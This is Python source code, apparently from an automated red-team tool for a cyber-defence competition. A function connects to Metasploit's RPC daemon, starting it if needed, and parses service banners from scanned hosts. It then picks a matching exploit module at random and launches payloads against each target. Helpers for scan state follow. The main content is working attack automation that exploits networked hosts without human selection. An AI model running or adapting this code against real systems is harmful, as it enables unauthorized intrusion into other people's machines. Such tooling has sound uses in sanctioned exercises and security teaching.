def msf_attack(host: str, *args, **kwargs):
client = None
tries = 0
while not client:
if tries > 5:
MSF.log("Giving up connecting to msfrpcd.", 'danger')
return
try:
client = MsfRpcClient(MSF.get_setting('password'))
except ConnectionRefusedError:
MSF.log("Can't connect to msfrpcd. Trying to start it...",
'warning')
if storage.get(get_lock()):
sleep(10)
else:
storage.incr(get_lock())
run(['msfrpcd', '-P', MSF.get_setting('password')])
storage.delete(get_lock())
except MsfRpcError:
MSF.log("Error connecting to msfrpcd. Is the password correct?",
'danger')
tries += 1
target = get_hosts()[host]
query = ""
port = None
# Loop through available services in random order, stop when there is a banner
index = 1
for p, data in random.sample(target['ports'].items(),
len(target['ports'])):
if data.get('banner'):
# Naive banner parsing
if query.lower() in ["microsoft", "windows"]:
index = 2
port = p
break
exploit = None
print(data['banner'])
while not exploit and index < len(data['banner'].split()):
exploit = None
print("Getting exploit")
try:
query = data['banner'].split()[index]
if query.endswith(':'):
index += 1
continue
print("Query: " + query)
try:
mod = random.choice(msf_search(client, query))
except SoftTimeLimitExceeded:
MSF.log(
"We're running out of time while trying to search. Increase task timeout to prevent this.",
"warning")
return
exploit = client.modules.use('exploit', mod)
except (IndexError, MsfRpcError):
index += 1
if not exploit:
MSF.log("Couldn't find exploit.", "warning")
print("Couldn't find exploit.")
return
print("Went with " + str(exploit.modulename))
MSF.log("Using exploit {} against {}:{}".format(exploit.modulename, host,
port))
for r in exploit.required:
if r == b'RHOST':
exploit['RHOST'.encode()] = host
elif r == b'RPORT':
exploit['RPORT'.encode()] = port
execute = None
p = 0
while p < len(exploit.payloads) and not execute:
try:
execute = exploit.execute(payload=exploit.payloads[p].decode())
except ValueError:
p += 1
else:
MSF.log(
'Exploit ' + str(exploit.modulename) + ' against ' + host +
' launched.', 'success')
def scan_in_progress() -> int:
"""
Return how many scans are in progress.
:return: Integer count of currrent running scans.
"""
return int(storage.get('scan_in_progress') or 0)
def get_last_scan() -> int:
"""
Shortcut to return the last scan time.
:return: UNIX timestamp of last scan.
"""
return int(storage.get('last_nmap_scan') or 0)
def get_last_update() -> int:
"""
Shortcut to return the last IScorE update time.
:return: UNIX timestamp of last update.
"""
return int(storage.get('last_iscore_update') or 0)
def get_hosts() -> Dict:
"""
Shortcut to retrieve hosts from storage.
:return: Dictionary of discovery hosts.
"""
return json.loads(storage.get('hosts') or "{}")